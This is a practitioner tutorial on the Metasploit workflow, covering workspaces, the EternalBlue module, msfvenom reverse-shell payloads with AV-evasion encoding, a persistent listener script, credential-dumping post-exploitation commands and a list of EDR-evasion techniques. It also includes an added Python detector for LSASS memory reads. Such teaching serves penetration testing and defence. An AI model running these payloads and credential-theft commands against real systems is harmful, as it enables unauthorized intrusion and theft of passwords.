Metasploit in 2026: The Practitioner Workflow

Manish Garg, Associate of (ISC)² · RingSafe
Apr 25, 2026

Last updated: April 26, 2026

Metasploit is the universal exploitation framework. Every penetration tester knows it; many use it superficially — search for an exploit, set RHOSTS, run, hope for shell. The full Metasploit workflow includes payload customisation, evasion, post-exploitation modules, listener management, and integration with the rest of the toolkit. This article covers the 2026 practitioner workflow with msfconsole.

The mental model

Metasploit consists of:

  • Modules — exploits, auxiliaries, payloads, encoders, post-exploitation
  • Sessions — established footholds (Meterpreter, shell, etc.)
  • Database — workspace tracking hosts, services, vulnerabilities, loot
  • Listeners — handlers waiting for incoming sessions

Workspace management

Every engagement should be its own workspace:

msfconsole
msf6 > workspace -a <client_name>
msf6 > db_status
msf6 > workspace

The PostgreSQL database behind the workspace tracks hosts, ports, vulnerabilities and credentials. Import Nmap XML output so that scan results populate those tables:

msf6 > db_import /tmp/nmap.xml
msf6 > hosts
msf6 > services
msf6 > vulns

Search and use modules

msf6 > search type:exploit name:eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options
msf6 > set RHOSTS 10.0.0.5
msf6 > set LHOST <your-ip>
msf6 > check  # Verify if vulnerable
msf6 > exploit

Always run check before exploit when the module supports it. It saves time on misclassified vulnerabilities and avoids firing an exploit at a host that was never vulnerable.

Payload customisation

Default payloads are signatured. Generate custom payloads with msfvenom:

# Windows reverse shell (staged)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

# With encoding for AV evasion (shikata_ga_nai is x86-only and fails the
# encoder compatibility check for an x64 payload; use an x64 encoder instead)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 \
  -e x64/xor_dynamic -i 5 -f exe -o shell.exe

# Stageless reverse HTTPS (note the underscore): the whole payload is in the
# file, so nothing is downloaded at runtime
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=443 -f exe -o shell.exe

Modern AV catches default Meterpreter signatures within 24 hours. For real engagements, use custom loaders (Donut + custom shellcode runner) — Metasploit’s encoding alone is insufficient.

Listener management

Use multi/handler with the resource-script pattern so the listener comes back with the same settings after every msfconsole restart:

cat > ~/.msf4/handler.rc << 'EOF'
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j
EOF

msfconsole -r ~/.msf4/handler.rc

Post-exploitation modules

Once you have a Meterpreter session, the post/ modules automate common tasks:

meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > load kiwi  # Load Mimikatz
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
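hashdump and kiwi's sekurlsa::logonpasswords both read LSASS process memory, which is also what defenders look for. The following added Python example (my own, not part of the article or of Metasploit) shows the detection side of this step: it runs over a few constructed log lines rendered as one JSON object per line with the fields of Sysmon Event ID 10 (ProcessAccess), and flags any process that opens lsass.exe with the PROCESS_VM_READ right unless the source binary is on an allowlist. The log lines, file paths and the allowlist are constructed for the example; the real Sysmon event is XML in the Windows event log, and a production rule would also consider CallTrace and signer information.

```python
import json
import ntpath

# Access-mask bits as defined for OpenProcess (from the Windows SDK).
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed allowlist of binaries that legitimately read LSASS on this fleet
# (assumption for the example; tune it to the environment's actual AV/EDR agents).
ALLOWLIST_BASENAMES = {"msmpeng.exe"}

# Constructed sample events: a simplified JSON-per-line rendering of Sysmon
# Event ID 10 fields, not the real Sysmon XML.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\shell.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\shell.exe",
     "TargetImage": r"C:\Windows\system32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\system32\cmd.exe"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)


def _basename_lower(win_path):
    # ntpath splits on backslashes regardless of the host OS running this script.
    return ntpath.basename(win_path).lower()


def detect_lsass_access(log_text, allowlist=ALLOWLIST_BASENAMES):
    """Return one alert dict per ProcessAccess event that reads LSASS memory from a non-allowlisted image."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 10:
            continue
        if _basename_lower(ev.get("TargetImage", "")) != "lsass.exe":
            continue
        access = int(ev.get("GrantedAccess", "0x0"), 16)
        if not access & PROCESS_VM_READ:
            # Query-only handles (e.g. 0x1000, PROCESS_QUERY_LIMITED_INFORMATION) cannot read memory.
            continue
        source = ev.get("SourceImage", "")
        if _basename_lower(source) in allowlist:
            continue
        alerts.append({
            "source": source,
            "granted_access": hex(access),
            "severity": "high" if access == PROCESS_ALL_ACCESS else "medium",
        })
    return alerts


if __name__ == "__main__":
    for a in detect_lsass_access(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['source']} opened lsass.exe with {a['granted_access']}")
```

Of the five constructed events only the second is raised: the Defender engine is allowlisted, svchost's 0x1000 handle has no read right, the notepad access is not against LSASS, and the last line is not a ProcessAccess event at all. The allowlist keyed on basename alone is deliberately simple; a masquerading binary named MsMpEng.exe in a user directory would slip past it, which is why real rules also check the image path and signature.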

Integration with other tools

  • Empire / Sliver / Covenant — modern C2 frameworks that Metasploit integrates with for post-exploitation handoff
  • BloodHound — once on a domain box, run SharpHound and ingest into BloodHound
  • CrackMapExec / NetExec — separate tool but complements Metasploit for SMB/AD discovery

The 2026 reality check

Metasploit-default payloads are reliably detected by modern EDR (CrowdStrike, SentinelOne, Defender). For real-world red-teaming you need:

  • Custom loaders to run shellcode
  • Process hollowing or DLL sideloading for stealth
  • HTTPS C2 with domain fronting
  • AMSI/ETW bypasses for in-memory execution

Metasploit remains useful for lab work, CTFs, exploitation of established vulnerabilities against unpatched targets, the post-exploitation modules and the listener infrastructure. For evading modern endpoint defences, custom tooling is required.

The takeaway

Metasploit in 2026 is the workhorse for the unglamorous parts of pentesting — reliable exploits against known CVEs, post-exploitation automation, listener management. For the leading edge of evasion, look elsewhere. Master the framework’s database, workspace, and module workflow; it makes the rest of your toolchain more productive.
